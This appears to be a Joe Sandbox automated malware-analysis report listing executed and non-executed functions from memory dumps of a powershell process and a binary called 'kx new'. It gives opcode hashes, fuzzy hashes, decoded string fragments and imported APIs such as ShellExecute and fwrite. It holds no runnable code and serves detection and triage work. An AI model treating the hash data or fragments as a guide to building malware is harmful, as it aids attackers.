                          Function 04EE9250 Relevance: .0, Instructions: 25COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f667f507bb2b0c9d1b8b4214d07b76f0afc5a5e59b94039fa400072c179a6127
                          • Instruction ID: 23d0f5cc6f03331c679c230ad2ae101936b97af66fb531dad8fadd2b02512a29
                          • Opcode Fuzzy Hash: f667f507bb2b0c9d1b8b4214d07b76f0afc5a5e59b94039fa400072c179a6127
                          • Instruction Fuzzy Hash: 5AF0ED75A043045BD764EFB9E49C79A7BE5FB45350F00482DD55EC7251DB396880CB90
                          Function 04EE8A58 Relevance: .0, Instructions: 24COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d4ffd2638d623c828c4226e77ef7f7ac5a35f11f81e25f2c660fe7a7060f6efd
                          • Instruction ID: 8c7eb48561858f99d2a62f81b363227d77545ba1073ccda6ed855fee6af18483
                          • Opcode Fuzzy Hash: d4ffd2638d623c828c4226e77ef7f7ac5a35f11f81e25f2c660fe7a7060f6efd
                          • Instruction Fuzzy Hash: 64E0263530861047CB0837B9A50C2AE7A5AEBC4728F00002ED60A87341CF78580183D5
                          Function 04EE9638 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5b9f8fedbda64d0a4d09af0e3f899ec732672f8af091940aa4a326a08512eb18
                          • Instruction ID: a5bd47e0d5e86cb1b6b0f3f53f4e98a451331cba3a2e0e32a2af79e562231275
                          • Opcode Fuzzy Hash: 5b9f8fedbda64d0a4d09af0e3f899ec732672f8af091940aa4a326a08512eb18
                          • Instruction Fuzzy Hash: 39D05E2230122647175932BB69106BBA1CF8BF54A9705253B9A08D7243EC54EC0103F1
                          Function 04EEDDD0 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                          • Instruction ID: 69f5d6350a0912946d7570b2f81f7e55373c11a6a30a9fc2b3fdc62ecac73192
                          • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                          • Instruction Fuzzy Hash: 6EE08631B04014A7CB08D59AD8148E9F7AADBCC220F04847FD90AA7340DA32691687D1
                          Function 04EEDD80 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7c080cd17fab87302cbec94b1f1230112d0add945a1af6f372f9d417dee6e2a3
                          • Instruction ID: 41a5c086be7400c314507ffc949837166585a2de90b3a76877e8f54f46e51331
                          • Opcode Fuzzy Hash: 7c080cd17fab87302cbec94b1f1230112d0add945a1af6f372f9d417dee6e2a3
                          • Instruction Fuzzy Hash: F9E0C231700716178225A65FBC00D6FB7EEDFC5671300842EE00AC7354DE64EC0687D5
                          Function 04EEF940 Relevance: .0, Instructions: 22COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1e1a63bbe02adf94c0166c62bdf5ba7fd5367b64b71965931d638c0ae6edeed0
                          • Instruction ID: 873efb29a038771ba71ae1bab4160d9c0e76b9b495b47b0a378bf45dcff2866f
                          • Opcode Fuzzy Hash: 1e1a63bbe02adf94c0166c62bdf5ba7fd5367b64b71965931d638c0ae6edeed0
                          • Instruction Fuzzy Hash: AFE01270E002469FC741DFFDC482159FFF0AF49214B2085EED949E7611E6724551CB91
                          Function 04EE88E0 Relevance: .0, Instructions: 21COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c50e53bd546ed55d2b73d0a41bcd1237be58e2a8b1ba4baa7db6ca281d5cbda1
                          • Instruction ID: 376b51284e68580a087269f2c6c01ecc175ddecd9d3fafe30a9cdea97e281770
                          • Opcode Fuzzy Hash: c50e53bd546ed55d2b73d0a41bcd1237be58e2a8b1ba4baa7db6ca281d5cbda1
                          • Instruction Fuzzy Hash: 92E0D87090A2865BCF19EFB8D04547DBFB1EB45214F00429DD909D7702D6711851DF81
                          Function 04EE8819 Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4a5a104852efcfde06381ba3d33bb1abfaa90ff0363fe2b332934675f2983986
                          • Instruction ID: 18187f23fbd25e896c969b0c2775c2da1b94014a669b9d67884befeda122fe4a
                          • Opcode Fuzzy Hash: 4a5a104852efcfde06381ba3d33bb1abfaa90ff0363fe2b332934675f2983986
                          • Instruction Fuzzy Hash: B3E04F31A090458BCF0DBBF4E59A4FE7F30EA05301B40059DE96692552EAB11996CB80
                          Function 04EE79FA Relevance: .0, Instructions: 16COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d866fe3dd9554246ed7bdb365b7877417e2867ff3cad620573c7452aa98e526d
                          • Instruction ID: afd69d3477bb1e2ea1a04856e4b572b1f2cc43e516f0370f4b93013fcb655196
                          • Opcode Fuzzy Hash: d866fe3dd9554246ed7bdb365b7877417e2867ff3cad620573c7452aa98e526d
                          • Instruction Fuzzy Hash: 9FD05E3000A344DFC30A5B75D4204343B34AF4660035804DAE0454B272CA32AC15E710
                          Function 04EEF950 Relevance: .0, Instructions: 16COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                          • Instruction ID: c5d56f877659bdbf1bbb935af0c96d87412f6a88380c8a6e19ae890a8c5fce64
                          • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                          • Instruction Fuzzy Hash: 66D06270D04209AF8780DFADC94156DFBF4EB49204F5085AA895DD7301F73256128FD1
                          Function 04EE88F0 Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 88cba287bd2c6fcf790134add3f870f261aeba6864f2728885173c829b801d4e
                          • Instruction ID: e15e4326fa8b5117a05faa17e12a28a6bb79621ec27a41158c615eecd9cd2c59
                          • Opcode Fuzzy Hash: 88cba287bd2c6fcf790134add3f870f261aeba6864f2728885173c829b801d4e
                          • Instruction Fuzzy Hash: 0AD01730E0820A8BCB18EFA8E54687EBBB5EB44200F004269DA0993340EA306841CBC1
                          Function 04EE8828 Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5f3c15013e596679cd0d40056f56068c02352e1bd2e9af6c741420bcac784835
                          • Instruction ID: dc27c2e9c54c595660e2a157c8399b7bec36da5bdd3c886f40aabc28992d36a2
                          • Opcode Fuzzy Hash: 5f3c15013e596679cd0d40056f56068c02352e1bd2e9af6c741420bcac784835
                          • Instruction Fuzzy Hash: 5BD067319081098BCB0CBBE5E95A4BEBB34FB14301F40416EDA2792291EA312A5ACAC5
                          Function 04EE7F71 Relevance: .0, Instructions: 10COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b756abb4d8fd5face3b35ea25959caa204eccc2a2a7a03bd17c0b78719d28c53
                          • Instruction ID: f527e5fa577612f8986b269d7ebfba70dfe2f9af49106037a7de7676eafb68b0
                          • Opcode Fuzzy Hash: b756abb4d8fd5face3b35ea25959caa204eccc2a2a7a03bd17c0b78719d28c53
                          • Instruction Fuzzy Hash: EDC012315492608FDB0A8B3484644563F71AF4764032684C7C141CB055C9300919E711
                          Function 04EE7A08 Relevance: .0, Instructions: 8COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9af988d654c25dc49fc27230b031535298b3bd4b34e5d71f634b76f0464bc608
                          • Instruction ID: ccfa95222edd6f0aaaac73ac6b647cadf52c2f4d0ea2a4b7bbf4ff51eeb89f4f
                          • Opcode Fuzzy Hash: 9af988d654c25dc49fc27230b031535298b3bd4b34e5d71f634b76f0464bc608
                          • Instruction Fuzzy Hash: 64B09230044708CFC2086F76A408829732DBA4020578408A8E40A0B3A68E37EC40CA44

                          Non-executed Functions

                          Function 07DA1BE0 Relevance: 20.4, Strings: 16, Instructions: 401COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2237372818.0000000007DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7da0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: $cBk$4'jq$4'jq$4'jq$4'jq$84Ml$84Ml$tPjq$tPjq$JPl$JPl$JPl$JPl$JPl$rOl$rOl
                          • API String ID: 0-314082401
                          • Opcode ID: 91d7cfd47214048fa8cf051cad833d744d153ebb3c5f41d9903b4351a5662b3c
                          • Instruction ID: 9ce405b5c5aa30f2b5b0636af9efcbd495bc3f380058662ead570f9ce2dfc017
                          • Opcode Fuzzy Hash: 91d7cfd47214048fa8cf051cad833d744d153ebb3c5f41d9903b4351a5662b3c
                          • Instruction Fuzzy Hash: 91D158B1B0424AAFCB218B6994006ABFBB6FFC5310F18847BC955DB255CB32DD45C7A2
                          Function 07DA3928 Relevance: 12.8, Strings: 10, Instructions: 321COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2237372818.0000000007DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7da0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq$tPjq$tPjq$$jq$$jq$$jq$$jq$El$El
                          • API String ID: 0-1045847289
                          • Opcode ID: 5a0cd4c1c993e551af9cbde1bf356ac58cc6413eb359b636d66371f596262993
                          • Instruction ID: 78ee8ea69f851e96e84e2fed61f1f2fd563ac22727af40f80b5470d7b405aac8
                          • Opcode Fuzzy Hash: 5a0cd4c1c993e551af9cbde1bf356ac58cc6413eb359b636d66371f596262993
                          • Instruction Fuzzy Hash: 7EA157B1704355AFC7259B69D901B66FFA7FFC6220F18846BD845CB2A2CA31CC45C7A2
                          Function 07DA1080 Relevance: 12.7, Strings: 10, Instructions: 184COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2237372818.0000000007DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7da0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: foq$84Ml$`Qjq$`Qjq$tPjq$$jq$$jq$$jq$$jq$$jq
                          • API String ID: 0-645480509
                          • Opcode ID: efb63192ff9441b3a7346f74f44773576011c5baba2a03554e0607a037e5c4d4
                          • Instruction ID: c255f0acb4810aeea5667abe16830640df13bb235f49ea9022b948ddaa1bc399
                          • Opcode Fuzzy Hash: efb63192ff9441b3a7346f74f44773576011c5baba2a03554e0607a037e5c4d4
                          • Instruction Fuzzy Hash: BA619FB0A0020EEFDB24CE44C545BAAF7F6FB45305F588166E841AB290C736DC81CB61
                          Function 04EEC762 Relevance: 11.4, Strings: 9, Instructions: 152COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: m^$m^$m^$m^$m^$m^$m^$m^$m^
                          • API String ID: 0-3443393009
                          • Opcode ID: 85d43f82ddc1f2d261a5c992cb1d84e15fa2be3d2e59043c3816d7176f68fb34
                          • Instruction ID: 4b1d099bc58da5dc82eaa53adfb2917bc264e62a8f4f229aa905969b408541a1
                          • Opcode Fuzzy Hash: 85d43f82ddc1f2d261a5c992cb1d84e15fa2be3d2e59043c3816d7176f68fb34
                          • Instruction Fuzzy Hash: 7A41E45290F3E11FD3175B3C9AA50D53F70AE53298B4A04D7C8D0CF1A7E859984EC3AA
                          Function 04EE3308 Relevance: 10.1, Strings: 8, Instructions: 140COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: FKp$m^$m^$m^$m^$m^$m^$m^
                          • API String ID: 0-459646051
                          • Opcode ID: 44df8df7544d5a17caf3685fbacead8d92e646591847ea6584cef3f674566a5c
                          • Instruction ID: 6b203c9b5da6a88a294ed13894f158913e42fb4f2eb0ec5e099bb835017c08b9
                          • Opcode Fuzzy Hash: 44df8df7544d5a17caf3685fbacead8d92e646591847ea6584cef3f674566a5c
                          • Instruction Fuzzy Hash: AA418452D0E7D51FE3075739AC695E27F709F53294B0902E7CCE48F1E3E908A80A8796
                          Function 07DA0488 Relevance: 9.2, Strings: 7, Instructions: 496COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2237372818.0000000007DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7da0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: foq$4'jq$4'jq$4'jq$4'jq$rOl$rOl
                          • API String ID: 0-3987889446
                          • Opcode ID: 8e711dee7d615b416e41d6abbe25f8c6d969fe0352165a42b4a7d457287fcca1
                          • Instruction ID: a279b60db0b88edfa3f68aae4179c53b7b4bf24ae570823b194ab41e57d0e3be
                          • Opcode Fuzzy Hash: 8e711dee7d615b416e41d6abbe25f8c6d969fe0352165a42b4a7d457287fcca1
                          • Instruction Fuzzy Hash: 7CF146B1704355AFCB159B789410AAAFBA6FFC6320F18C47BD545CB291EA35CC42C7A2
                          Function 07DA3678 Relevance: 8.9, Strings: 7, Instructions: 186COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2237372818.0000000007DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7da0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq$$jq$$jq$$jq$El$El
                          • API String ID: 0-2108968551
                          • Opcode ID: 53643bc0b9392347335e1bed8691077e562ec57cfcdb67a493dc57ebfdc9fdd4
                          • Instruction ID: 4ccbaf87d3ec8b88d4bac9613c4f7e122502a47d1b4b20893e408cc861a7a811
                          • Opcode Fuzzy Hash: 53643bc0b9392347335e1bed8691077e562ec57cfcdb67a493dc57ebfdc9fdd4
                          • Instruction Fuzzy Hash: 7B5136B5704306AFCB249A799400B66FBB7FFC6261F28847BD885CB251DB35C845C7A2
                          Function 04EE7AE8 Relevance: 6.5, Strings: 5, Instructions: 237COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: tMOl$`kq$`kq$`kq$`kq
                          • API String ID: 0-3148330094
                          • Opcode ID: 4a6441cb5615088457bc83952b591190bb47dd6f456566d447665b7b661e2664
                          • Instruction ID: b8de9d9b340a3fc30f02e4453b6e0def5bf6adf002c523f31490b0ff764fa690
                          • Opcode Fuzzy Hash: 4a6441cb5615088457bc83952b591190bb47dd6f456566d447665b7b661e2664
                          • Instruction Fuzzy Hash: 01B1A574E0020A9FDB54DFA9D980A9DFBF6FF88304F108629D419AB355DB34A945CF90
                          Function 04EE7AF8 Relevance: 6.5, Strings: 5, Instructions: 234COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: tMOl$`kq$`kq$`kq$`kq
                          • API String ID: 0-3148330094
                          • Opcode ID: d102071bef278cf68d8e1e98e40b546e2d12aeee610b6ef2ff5b83a406fa8281
                          • Instruction ID: b63cca1893994932b3c73988923c21101699a8cdc8445076421675a63ad2c059
                          • Opcode Fuzzy Hash: d102071bef278cf68d8e1e98e40b546e2d12aeee610b6ef2ff5b83a406fa8281
                          • Instruction Fuzzy Hash: 3AB19474E0020A9FDB54DFA9D980A9DFBF6FF88304F108629D419AB355EB34A905CF90
                          Function 04EE348D Relevance: 6.3, Strings: 5, Instructions: 93COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: m^$m^$m^$m^$m^
                          • API String ID: 0-1825230704
                          • Opcode ID: 98b6158a8c3003266bae69a65579daa456e7ee95188b0ae6e575bed41bc656db
                          • Instruction ID: 2d013ec948751d021ea1ecee9e11e96e3c45b7deb096ae938509b99bf572928f
                          • Opcode Fuzzy Hash: 98b6158a8c3003266bae69a65579daa456e7ee95188b0ae6e575bed41bc656db
                          • Instruction Fuzzy Hash: 5C21B452D0E7D21FD30B83389D690927F30AE2328470D15EBC8A1CF1E3E60C640E87AA
                          Function 07DA0308 Relevance: 6.3, Strings: 5, Instructions: 57COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2237372818.0000000007DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7da0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq$4'jq$$jq$$jq
                          • API String ID: 0-2228512047
                          • Opcode ID: ee35703d66dcf72a419040d97453d510c04cc46f808df2833b368046f49c538f
                          • Instruction ID: 088aea9755b7b4242a5371af13de02d6f15d009d926ac99b241442252fa86dcb
                          • Opcode Fuzzy Hash: ee35703d66dcf72a419040d97453d510c04cc46f808df2833b368046f49c538f
                          • Instruction Fuzzy Hash: 9901D660B4D351AFC7261768692016AEBB7BFC355072940ABC881DF297DE198D068397
                          Function 04EE82CF Relevance: 6.3, Strings: 5, Instructions: 43COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: "$$$;$C$C
                          • API String ID: 0-96336739
                          • Opcode ID: 7516153c6d15081813c635350423f5c3693b44348f741cbd331e517485f53608
                          • Instruction ID: e3266c784f1ac4042a74061ec081221c083b33e035968181fbb6ef2783e262cb
                          • Opcode Fuzzy Hash: 7516153c6d15081813c635350423f5c3693b44348f741cbd331e517485f53608
                          • Instruction Fuzzy Hash: 5D014F6210B3C54FCB038F69A4D45D63F71EF13289B0A01D7CC84DE077C96A559AC722
                          Function 07DA5798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2237372818.0000000007DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7da0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: $jq$$jq$$jq$$jq
                          • API String ID: 0-2428501249
                          • Opcode ID: e60f40ae1e02d75e65223172d36b71aa5d59adf103d44586f664ef4fd61c555c
                          • Instruction ID: 9aba17b28076b1d2592b95706cf635401571914c0e7e9ff8c3c4ff268590b8a9
                          • Opcode Fuzzy Hash: e60f40ae1e02d75e65223172d36b71aa5d59adf103d44586f664ef4fd61c555c
                          • Instruction Fuzzy Hash: 2D2147B2310316BFDB24997AA800B27FBDABFC1711F24842AE947DB381DD35C8118361
                          Function 04EE12B0 Relevance: 5.1, Strings: 4, Instructions: 51COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: m^$m^$m^$m^
                          • API String ID: 0-92939119
                          • Opcode ID: 15bdc202bd45e5389298e199a4a8f710910253d6ed18eda5f34472d393bc8173
                          • Instruction ID: 39d7396383879cea78a17e7b847965a4dc9d5894a900be48e1fe85191fe8941e
                          • Opcode Fuzzy Hash: 15bdc202bd45e5389298e199a4a8f710910253d6ed18eda5f34472d393bc8173
                          • Instruction Fuzzy Hash: B901DF2285A7C44FC3134BA8DCA59F17FB0EF07250B0A06D3CC90CF663D018291DA7A6
                          Function 07DA2108 Relevance: 5.0, Strings: 4, Instructions: 46COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2237372818.0000000007DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7da0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: $jq$$jq$JPl$JPl
                          • API String ID: 0-131527678
                          • Opcode ID: 5462a0daac226be5688c3dccb4a0a86b36c25dcf90632a596ae82a4e63093ea1
                          • Instruction ID: 43697999d5fd1489a261492d87b1ab3b1754cc3be35ea8a04ff2ab6e02acb45f
                          • Opcode Fuzzy Hash: 5462a0daac226be5688c3dccb4a0a86b36c25dcf90632a596ae82a4e63093ea1
                          • Instruction Fuzzy Hash: D201D4726093815FC3220A295C11553AFA7BFE361071985ABC580DF26ACA389C08C7B6

                          Execution Graph

                          Execution Coverage:80.5%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:28
                          Total number of Limit Nodes:1

                          Callgraph

                          • Executed
                          • Not Executed
                          • Opacity -> Relevance
                          • Disassembly available
                          callgraph 0 Function_00401000 1 Function_00401410 2 Function_004014D1 4 Function_0040145B 2->4 3 Function_004013B4 4->1 4->3 5 Function_0040108C 4->5 5->0

                          Executed Functions

                          Function 004014D1 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.2125880811.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.2125768612.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 0000000D.00000002.2125930016.0000000000402000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 0000000D.00000002.2125930016.0000000000E02000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 0000000D.00000002.2127865702.0000000000E73000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_kx new.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled__getmainargs__set_app_type_controlfpexitmemset
                          • String ID:
                          • API String ID: 3649950142-0
                          • Opcode ID: 52dce7b4c269adca2e135b0b260f3394da02cf0dcd0238186c5a4fef22fa7b26
                          • Instruction ID: 276d267c830fb1744484ad8078350a7426bd4a7cdf1eb4e40a6b3a9487509305
                          • Opcode Fuzzy Hash: 52dce7b4c269adca2e135b0b260f3394da02cf0dcd0238186c5a4fef22fa7b26
                          • Instruction Fuzzy Hash: 2B11ECF5A00204AFCB00EBA9DC55F4A73ECE748304F144475F909F7361E579E9888B65
                          Function 0040108C Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 239filestringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.2125880811.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.2125768612.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 0000000D.00000002.2125930016.0000000000402000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 0000000D.00000002.2125930016.0000000000E02000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 0000000D.00000002.2127865702.0000000000E73000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_kx new.jbxd
                          Similarity
                          • API ID: ExecuteShellmemset$fclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                          • String ID: ! @$%s\%s$& @$1 @$`!@$e!@$t!@
                          • API String ID: 3236948872-2690058073
                          • Opcode ID: f45ba74685a2dc3ad5a1e5aaf52b6cc29edc716cfb621912138e64ca51a8567c
